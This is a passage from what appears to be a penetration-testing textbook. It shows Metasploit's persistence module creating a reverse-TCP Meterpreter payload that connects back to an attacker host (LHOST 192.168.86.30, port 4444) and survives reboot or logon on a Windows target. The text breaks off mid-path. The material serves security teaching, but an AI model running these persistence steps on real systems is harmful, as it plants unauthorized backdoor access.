[
*
]
Meterpreter session
1
opened
(
192.168.86.30:4444 -> 192.168.86.57:1045
)
at
2018-02-12 07:12:30 -0700
This has left us with a Meterpreter session. We’ll use that session to run our persis‐
tence module. Using this module, we’ll have the ability to select the payload we want
to use, which will be the means we use to connect to the target. The default payload is
a reverse-TCP Meterpreter payload, which is the one we have been mostly using
when we’ve used Meterpreter. This will require that a handler is set up to receive the
connection. We’ll also get to select the persistence mechanism, determining whether
to start up the payload when the system boots or when the user logs in. You can also
determine the location of where to write the payload. The system-defined temporary
directory is used by default.
Example 6-23
shows loading up persistence on our
target.
Example 6-23. Running the persistence module
meterpreter > run persistence -A
[
!
]
Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[
!
]
Example: run post/windows/manage/persistence_exe
OPTION
=
value
[
...
]
[
*
]
Running Persistence Script
[
*
]
Resource file
for
cleanup created at /root/.msf4/logs/persistence/
SYSTEM-C765F2_20180212.1402/BRANDEIS-C765F2_20180212.1402.rc
[
*
]
Creating
Payload
=
windows/meterpreter/reverse_tcp
LHOST
=
192.168.86.30
LPORT
=
4444
[
*
]
Persistent agent script is
99606
bytes long
[
+
]
Persistent Script written to C:
